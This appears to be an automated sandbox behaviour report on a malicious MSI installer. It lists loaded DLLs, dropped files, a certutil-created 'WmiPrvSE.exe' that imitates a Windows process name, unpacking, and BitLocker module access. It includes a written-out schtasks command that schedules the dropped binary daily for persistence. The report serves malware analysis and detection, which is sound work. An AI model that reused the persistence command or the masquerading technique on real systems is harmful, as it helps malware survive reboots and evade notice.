Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: certca.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\Public\WmiPrvSE.exe	Section loaded: apphelp.dll
Source: C:\Users\Public\WmiPrvSE.exe	Section loaded: wininet.dll
Source: C:\Users\Public\WmiPrvSE.exe	Section loaded: cryptsp.dll
Source: C:\Users\Public\WmiPrvSE.exe	Section loaded: rsaenh.dll
Source: C:\Users\Public\WmiPrvSE.exe	Section loaded: cryptbase.dll
Source: C:\Users\Public\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Users\Public\WmiPrvSE.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\WmiPrvSE.exe	Section loaded: iertutil.dll
Source: C:\Users\Public\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Users\Public\WmiPrvSE.exe	Section loaded: profapi.dll
Source: C:\Users\Public\WmiPrvSE.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\WmiPrvSE.exe	Section loaded: winhttp.dll
Source: C:\Users\Public\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\WmiPrvSE.exe	Section loaded: iphlpapi.dll
Source: C:\Users\Public\WmiPrvSE.exe	Section loaded: winnsi.dll
Source: C:\Users\Public\WmiPrvSE.exe	Section loaded: urlmon.dll
Source: C:\Users\Public\WmiPrvSE.exe	Section loaded: srvcli.dll
Source: C:\Users\Public\WmiPrvSE.exe	Section loaded: netutils.dll
Source: C:\Users\Public\WmiPrvSE.exe	Section loaded: schannel.dll

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

File written: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 1eSOBjseu2.msi

Static file information: File size 3488768 > 1048576

Source:	Binary string: b.pdb>w source: powershell.exe, 0000000D.00000002.1527530521.000000000279D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\aipackagechainer.pdb source: aipackagechainer.exe, 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmp, aipackagechainer.exe, 00000004.00000000.1428985582.00000000000FE000.00000002.00000001.01000000.00000003.sdmp, 1eSOBjseu2.msi, aipackagechainer.exe.3.dr, 643ea8.msi.2.dr, 643eab.msi.2.dr
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 0000000B.00000002.1536757222.0000000007B39000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdbOS= source: powershell.exe, 0000000D.00000002.1566035270.0000000006E85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: HP<oXC:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1565225176.0000000006A69000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1576734611.00000000076B9000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1583062786.00000000069D9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 0000000F.00000002.1581398989.0000000007B3E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ?\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000B.00000002.1536757222.0000000007B39000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: 1eSOBjseu2.msi, MSI44AA.tmp.2.dr, MSI40EF.tmp.2.dr, 643ea8.msi.2.dr, 643eab.msi.2.dr
Source:	Binary string: tomation.pdbk source: powershell.exe, 00000011.00000002.1530812316.00000000029AB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: Desktop.exe, 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmp, Desktop.exe, 00000005.00000000.1431460900.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmp, Desktop.exe, 00000005.00000003.1434163995.000002EF11318000.00000004.00000020.00020000.00000000.sdmp, Desktop.exe, 00000005.00000003.1433314174.000002EF12A71000.00000004.00000020.00020000.00000000.sdmp, 1eSOBjseu2.msi, Desktop.exe.3.dr, 643ea8.msi.2.dr, 643eab.msi.2.dr
Source:	Binary string: pdbpdblib.pdb=e\fo source: powershell.exe, 0000000D.00000002.1566035270.0000000006E85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .textn.pdb ` source: powershell.exe, 0000000F.00000002.1581398989.0000000007B00000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: 1eSOBjseu2.msi, MSI3FB2.tmp.2.dr, MSI4080.tmp.2.dr, MSI4020.tmp.2.dr, MSI40BF.tmp.2.dr, MSI4060.tmp.2.dr, 643ea8.msi.2.dr, 643eab.msi.2.dr

Data Obfuscation

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\Public\WmiPrvSE.exe

Unpacked PE file: 23.2.WmiPrvSE.exe.760000.2.unpack

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe

Code function: 4_2_00087860 LoadLibraryW,GetProcAddress,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,LoadImageW,FreeLibrary,

4_2_00087860

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe

File created: C:\Users\Public\__tmp_rar_sfx_access_check_6571921

Jump to behavior

Source: Desktop.exe.3.dr	Static PE information: real checksum: 0x0 should be: 0xb6743
Source: aipackagechainer.exe.3.dr	Static PE information: real checksum: 0xe08ec should be: 0xdbe3a

Source: Desktop.exe.3.dr	Static PE information: section name: .didat
Source: Desktop.exe.3.dr	Static PE information: section name: _RDATA
Source: WmiPrvSE.exe.21.dr	Static PE information: section name: .xdata

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000CD1B4 push ecx; ret	4_2_000CD1C7
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB275156 push rsi; retf	5_2_00007FF7BB275157
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB275166 push rsi; retf	5_2_00007FF7BB275167
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_042F6A5D push esp; ret	9_2_042F6A83
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_001D1F53 push rbx; retf	23_2_001D1F54
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_001D776C push 0000006Ah; retf	23_2_001D7784
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_0045425C push rbp; retf	23_2_0045426F
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_00454274 push rbp; retf	23_2_00454277
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_0045422C push rsi; retf	23_2_0045422F
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_00454234 push r14; retf	23_2_00454237
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_004542C4 push rsi; retf	23_2_004542CF
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_004542DC push rsp; retf	23_2_004542DF
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_004542E4 push rbp; retf	23_2_004542E7
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_0045429C push rbp; retf	23_2_0045429F
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_004542A4 push rbp; retf	23_2_00454277
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_004542A4 push rbp; retf	23_2_00454287
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_004542A4 push rbp; retf	23_2_004542B7
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_004542AC push rbp; retf	23_2_00454287
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_004542AC push rbp; retf	23_2_004542B7
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_004542BC push rsi; retf	23_2_004542BF
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_00454314 push rbp; retf	23_2_00454317
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_0045431C push r14; retf	23_2_00454327
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_00784070 push rbp; retf	23_2_007924FB
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_007840C4 push rbp; retf	23_2_0079250B
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_00792170 push rbp; retf	23_2_00792173
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_00792168 push rbp; retf	23_2_0079216B
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_0079916C push 0000006Ah; retf	23_2_00799184
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_00793953 push rbx; retf	23_2_00793954
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_00792130 push rsi; retf	23_2_0079213B
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_00792128 push rsi; retf	23_2_0079212B
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_007921C0 push rbp; retf	23_2_007921C3

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI4080.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI40EF.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI4020.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI44AA.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI40BF.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI4060.tmp	Jump to dropped file
Source: C:\Windows\System32\certutil.exe	File created: C:\Users\Public\WmiPrvSE.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3FB2.tmp	Jump to dropped file

Source: C:\Windows\System32\certutil.exe

File created: C:\Users\Public\WmiPrvSE.exe

Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI4080.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI40EF.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI4020.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI44AA.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI40BF.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI4060.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3FB2.tmp	Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\System32\certutil.exe

File created: C:\Users\Public\WmiPrvSE.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe SchTasks /Create /SC DAILY /TN WmiPrvSE /TR "C:\Users\Public\WmiPrvSE.exe" /ST 19:00 /f

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
